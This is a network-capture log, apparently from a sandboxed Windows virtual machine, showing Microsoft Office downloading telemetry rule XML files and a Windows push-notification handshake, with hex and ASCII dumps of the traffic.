2024-11-04 16:31:23 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:23 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA701121" x-ms-request-id: 99102dbc-c01e-0066-43c1-2ca1ec000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163123Z-16547b76f7fxdzxghC1DFWmf7n000000041g000000008e2e x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:23 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.5	49740	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:24 UTC	192	OUT	GET /rules/rule120623v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:24 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:24 GMT Content-Type: text/xml Content-Length: 464 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97FB6C3C" x-ms-request-id: 63ea3643-901e-0015-3101-2db284000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163124Z-16547b76f7f4k79zhC1DFWu9y000000003zg000000007prv x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:24 UTC	464	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor

Session ID	Source IP	Source Port	Destination IP	Destination Port
24	192.168.2.5	49741	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:24 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:24 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:24 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163124Z-16547b76f7fwvr5dhC1DFW2c9400000003s000000000nczr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:24 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
25	192.168.2.5	49742	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:24 UTC	192	OUT	GET /rules/rule120625v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:24 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:24 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT ETag: "0x8DC582B9748630E" x-ms-request-id: 11ffd83c-b01e-003d-6a61-2ed32c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163124Z-15869dbbcc6j87jfhC1DFWky3s00000003tg000000004f4x x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:24 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
26	192.168.2.5	49744	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:25 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:25 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:25 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: d33e01be-001e-0082-0958-2e5880000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163125Z-15869dbbcc6xcpf8hC1DFWxtx000000003ug0000000032gg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-04 16:31:25 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
27	192.168.2.5	49745	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:25 UTC	192	OUT	GET /rules/rule120626v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:25 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DACDF62" x-ms-request-id: 764b7f95-c01e-00a1-1c00-2d7e4a000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163125Z-16547b76f7fnm7lfhC1DFWkxt400000003ug00000000b2x2 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:25 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
28	192.168.2.5	49746	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:25 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:25 UTC	470	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:25 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 57f8276b-001e-000b-7658-2e15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163125Z-176bd8f9bc5kp2ljhC1DFW54h000000005c0000000000ncv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:25 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
29	192.168.2.5	49743	40.115.3.253	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:25 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4f 33 4b 71 68 48 35 35 71 55 32 38 50 38 4e 5a 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 35 62 31 32 39 34 34 38 33 66 61 37 35 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: O3KqhH55qU28P8NZ.1Context: ec5b1294483fa75a
2024-11-04 16:31:25 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-11-04 16:31:25 UTC	1084	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 4f 33 4b 71 68 48 35 35 71 55 32 38 50 38 4e 5a 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 35 62 31 32 39 34 34 38 33 66 61 37 35 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 51 6e 50 35 6e 79 30 73 4f 50 46 38 2f 39 73 66 6b 6b 38 39 4a 49 68 73 36 7a 75 59 33 54 4c 6a 75 30 65 6d 73 75 46 63 42 6e 7a 37 38 4b 75 4f 38 55 75 44 74 45 35 6b 53 35 57 7a 4b 72 59 62 46 41 6d 30 2b 69 35 59 47 65 7a 35 6b 70 78 7a 48 67 50 30 57 67 77 53 71 32 4b 58 35 76 37 69 79 51 51 43 42 64 65 77 6a 45 45 36 4c Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: O3KqhH55qU28P8NZ.2Context: ec5b1294483fa75a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAQnP5ny0sOPF8/9sfkk89JIhs6zuY3TLju0emsuFcBnz78KuO8UuDtE5kS5WzKrYbFAm0+i5YGez5kpxzHgP0WgwSq2KX5v7iyQQCBdewjEE6L
2024-11-04 16:31:25 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4f 33 4b 71 68 48 35 35 71 55 32 38 50 38 4e 5a 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 63 35 62 31 32 39 34 34 38 33 66 61 37 35 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: O3KqhH55qU28P8NZ.3Context: ec5b1294483fa75a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-11-04 16:31:26 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-11-04 16:31:26 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 45 31 35 48 34 34 62 64 4f 45 79 71 4a 79 48 6b 67 4d 5a 59 42 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: E15H44bdOEyqJyHkgMZYBQ.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port
30	192.168.2.5	49747	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:26 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:26 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:26 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163126Z-16547b76f7fnlcwwhC1DFWz6gw00000003z000000000gzp2 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:26 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
31	192.168.2.5	49748	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:26 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:26 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:26 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8e718dad-301e-0051-6df1-2c38bb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163126Z-16547b76f7f7rtshhC1DFWrtqn00000003vg00000000qa54 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-04 16:31:26 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.5	49749	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-04 16:31:26 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-04 16:31:26 UTC	491	IN	HTTP/1.1 200 OK Date: Mon, 04 Nov 2024 16:31:26 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 0e31b739-001e-002b-304d-2e99f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241104T163126Z-15869dbbcc6sg5zbhC1DFWbk2000000003ug0000000082wf x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
